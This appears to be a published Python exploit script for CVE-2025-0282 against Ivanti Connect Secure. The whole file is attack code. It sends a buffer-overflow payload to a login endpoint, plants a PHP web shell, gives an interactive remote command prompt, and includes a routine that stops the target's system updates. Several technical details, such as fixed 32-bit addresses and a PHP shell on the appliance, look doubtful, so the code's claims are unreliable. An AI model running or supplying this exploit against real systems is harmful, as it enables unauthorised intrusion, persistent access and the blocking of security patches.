# Exploit Title: Ivanti Connect Secure 22.7R2.5  - Remote Code Execution (RCE)
# Date: 2025-01-11
# Exploit Author: @absholi7ly
# CVE: CVE-2025-0282

import requests
import sys
import struct
import socket
import ssl
import urllib3
import time

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):

    payload = b"A" * offset  # Fill the buffer
    payload += struct.pack("<I", system_address)  # Overwrite return address with system()
    payload += b"BBBB"  # Fake return address
    payload += struct.pack("<I", command_address)  # Address of the command
    payload += command.encode()  # Command to execute
    return payload

def send_payload(target_ip, payload):

    try:
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        ssl_sock = context.wrap_socket(sock, server_hostname=target_ip)

        ssl_sock.connect((target_ip, 443))
        print(f"[+] Connected to {target_ip} on port 443 (HTTPS).")

        exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi"
        http_request = (
            f"POST {exploit_endpoint} HTTP/1.1\r\n"
            f"Host: {target_ip}\r\n"
            f"Content-Length: {len(payload)}\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"\r\n"
        ).encode() + payload

        ssl_sock.send(http_request)
        response = ssl_sock.recv(4096)
        ssl_sock.close()
        return response.decode(errors="replace")

    except Exception as e:
        print(f"[-] Error sending payload: {e}")
        return None

def exploit_vulnerability(target_ip, command):

    payload = create_exploit_payload(command)
    response = send_payload(target_ip, payload)
    if response:
        print("[+] Payload sent successfully.")
    else:
        print("[-] No response received.")

def upload_web_shell(target_ip, local_shell_path):

    try:
        with open(local_shell_path, "r") as f:
            web_shell_content = f.read()

        command = f"echo '{web_shell_content}' > /shell.php"
        exploit_vulnerability(target_ip, command)
        print("[+] Web shell uploaded successfully at /shell.php.")
        verify_shell(target_ip)

    except Exception as e:
        print(f"[-] Error uploading web shell: {e}")

def verify_shell(target_ip):

    shell_url = f"http://{target_ip}/shell.php"
    try:
        response = requests.get(shell_url, verify=False, timeout=10)
        if response.status_code == 200:
            print("[+] Web shell is accessible.")
        else:
            print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error verifying web shell: {e}")

def execute_shell_command(target_ip, command):

    shell_url = f"http://{target_ip}/shell.php"
    try:
        # Sending the command via POST
        response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10)
        if response.status_code == 200:
            print(f"[+] Command output:\n{response.text.strip()}")
        else:
            print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error executing command via web shell: {e}")

def disable_updates(target_ip):

    commands = [
        "systemctl stop apt-daily.service",
        "systemctl disable apt-daily.service"
    ]
    for command in commands:
        execute_shell_command(target_ip, command)
    print("[+] System updates disabled successfully.")


def main():

    if len(sys.argv) != 3:
        print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>")
        sys.exit(1)

    target_ip = sys.argv[1]
    local_shell_path = sys.argv[2]

    # Upload the web shell
    upload_web_shell(target_ip, local_shell_path)

    while True:
        command = input("Enter command to execute on the target (or 'exit' to quit): ")
        if command.lower() == "exit":
            print("Exiting...")
            break

        execute_shell_command(target_ip, command)

if __name__ == "__main__":
    main()